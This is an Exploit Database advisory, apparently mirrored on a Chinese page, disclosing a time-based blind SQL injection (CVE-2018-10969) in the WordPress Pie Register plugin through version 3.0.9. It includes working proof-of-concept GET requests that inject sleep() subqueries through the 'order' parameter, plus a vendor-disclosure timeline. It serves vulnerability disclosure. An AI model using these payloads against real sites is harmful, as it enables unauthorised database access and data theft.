WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection

• Exploit Database
• 99 阅读

• 作者： Manuel García Cárdenas
  日期： 2018-06-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44867/

• # Title: WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection
  # Author: Manuel García Cárdenas
  # Date: 2018-05-10
  # Software: WordPress Plugin Pie Register 3.0.9
  # CVE: CVE-2018-10969
  
  # I. VULNERABILITY
  # WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection
  
  # II. BACKGROUND
  # Pie-Register is a quick and easy way to brand your Registration Pages on
  # WordPress sites.
  
  # III. DESCRIPTION
  # This bug was found using the portal in the files:
  # /pie-register/classes/invitation_code_pagination.php:if ( isset(
  # $_GET['order'] ) && $_GET['order'] )
  # /pie-register/classes/invitation_code_pagination.php:$order =
  # $_GET['order'];
  # And when the query is executed, the parameter "order" it is not sanitized.
  # /pie-register/classes/invitation_code_pagination.php:$this->order = esc_sql( $order );
  
  # IV. PROOF OF CONCEPT
  # The following URL have been confirmed to all suffer from Time Based SQL Injection.
  
  GET
  /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc
  (original)
  
  GET
  /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(2)))a)
  HTTP/1.1(2 seconds of response)
  
  GET
  /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(30)))a)
  HTTP/1.1(30 seconds of response)
  
  # V. SYSTEMS AFFECTED
  # Pie Register <= 3.0.9
  
  # VI. DISCLOSURE TIMELINE
  # May 10, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
  # May 10, 2018 2: Send to vendor without response
  # June 05, 2018 3: Second email to vendor without response
  # June 11, 2018 4: Send to the Full-Disclosure lists
  
  # VII. Solution
  # Disable plugin until a fix is available